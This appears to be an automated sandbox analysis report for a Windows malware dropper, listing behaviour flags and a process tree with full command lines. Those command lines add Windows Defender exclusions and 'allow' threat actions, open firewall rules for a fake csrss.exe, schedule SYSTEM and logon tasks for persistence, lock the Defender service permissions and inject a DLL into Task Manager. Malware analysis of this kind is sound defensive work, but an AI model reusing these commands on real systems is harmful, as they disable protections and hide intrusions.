d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe
"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe
"C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe"
C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe
"C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3400 -ip 3400
C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
"C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 1128
C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe
"C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
"C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
"C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe"
C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe
"C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe
"C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe"
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
"C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe" --silent --allusers=0
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6f17e1d0,0x6f17e1dc,0x6f17e1e8
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe" --version
C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe
.\Install.exe /nxdidQZJ "385118" /S
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
"C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=724 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240419140452" --session-guid=70a790ff-7af7-4039-a4c9-a3be2700ab7a --server-tracking-blob="NTU2OWNkYmVmNDljZjA1NzFhNjFjZjIyYTUxMzVlYTQzNzNjYTQ3NzAwNTlhODZjZWI2NGM0YTg4NDdkZmMyNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNTM1NDgxLjYxMzkiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMmFhMmY4YjctMTViNS00YWYxLTljOWItNTZkMTEyNjJlZTBlIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=2804000000000000
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6e02e1d0,0x6e02e1dc,0x6e02e1e8
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe\" em /OQsite_idAGR 385118 /S" /V1 /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xd86038,0xd86044,0xd86050
C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe
"C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3076 -ip 3076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 1652
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe em /OQsite_idAGR 385118 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 